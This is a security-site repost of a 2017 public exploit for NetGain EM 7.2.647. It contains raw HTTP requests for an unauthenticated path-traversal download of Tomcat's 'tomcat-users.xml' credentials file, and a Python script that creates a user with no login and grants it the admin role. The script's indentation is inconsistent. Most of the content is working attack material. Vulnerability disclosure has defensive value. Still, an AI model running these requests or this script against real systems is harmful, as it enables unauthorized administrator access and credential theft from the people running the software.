首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion
来源:vfocus.net 作者:f3ci 发布时间:2017-05-25  
'''
# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
 
Add User Account with Admin Privilege without Login
----------------------------------------------
We can create user and give admin privilege to user which we have made
without login.
Because this app does not check the session on this request
 
 
Local File Inclusion
----------------------------------------------
Normal Request:
 
POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
 
filename=iossd.log
 
We can download another file with change value on filename parameter and
also we can send this request without login.
 
Example:
 
POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
 
filename=../../tomcat/conf/tomcat-users.xml
'''
#!/usr/local/bin/python
# Exploit Title: Add User Account with Admin Privilege without Login
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
 
import requests
import sys
 
try:
 def create():
    ip = str(sys.argv[1])
    port = str(sys.argv[2])
    user = str(sys.argv[3])
    passwd = str(sys.argv[4])
 
    print "\033[1;32m[+]\033[1;m Try to Create user"
    url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
    data= {
        'new': "true",
        'id': "",
        'name': user,
        'dname': "foobar",
        'password': passwd,
        'password2': passwd,
        'description': "",
        'emails': "foo@bar.com",
        'mobileNumber': "000000",
        'loginAttempts': "5",
        }
    response = requests.post(url, data=data)
    status = response.status_code
    if status == 200:
        print "\033[1;32m[+]\033[1;m Success!!"
        role()
    else:
        print "\033[91m[-]\033[91;m Create User Failed"
 
 
 def role():
    ip = str(sys.argv[1])
        port = str(sys.argv[2])
    user = str(sys.argv[3])
        passwd = str(sys.argv[4])
 
    print "\033[1;32m[+]\033[1;m Get admin role"
    url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
    data= {
        'name': "admin",
        'description': "Administrator",
        'users': [user,"admin"],
        }
    response = requests.post(url, data=data)
    status = response.status_code
    if status == 200:
        print "\033[1;32m[+]\033[1;m Success!!"
        print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
    else:
        print "\033[91m[-]\033[91;m Get admin role Failed"
 
 create();
 
except:
    print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
    print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KDE 4/5 - 'KAuth' Privilege Es
·Dup Scout Enterprise 9.7.18 -
·VX Search Enterprise GET Buffe
·Samba is_known_pipename() Arbi
·Sync Breeze Enterprise GET Buf
·Samba 3.5.0 - Remote Code Exec
·MediaWiki SyntaxHighlight Exte
·Apple WebKit / Safari 10.0.3(1
·Linux Kernel 4.11 - eBPF Verif
·Apple WebKit / Safari 10.0.3(1
·VMware Workstation for Linux 1
·WebKit - 'ContainerNode::parse
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved